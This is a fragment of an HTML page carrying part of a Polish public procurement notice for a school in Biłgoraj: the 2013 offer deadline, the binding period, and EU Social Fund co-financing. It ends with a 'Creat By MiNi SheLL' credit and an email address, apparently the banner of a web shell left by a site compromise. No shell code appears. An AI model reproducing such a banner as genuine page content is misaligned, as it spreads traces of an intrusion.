<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Zawodowych i Ogólnokształcących w Biłgoraju
ul. Przemysłowa 23, 23-400 Biłgoraj
Sekretariat szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2013 godzina 09:00, miejsce: Zespół Szkół Zawodowych i Ogólnokształcących w Biłgoraju
ul. Przemysłowa 23, 23-400 Biłgoraj
Sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach Priorytetu IX Działania 9.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com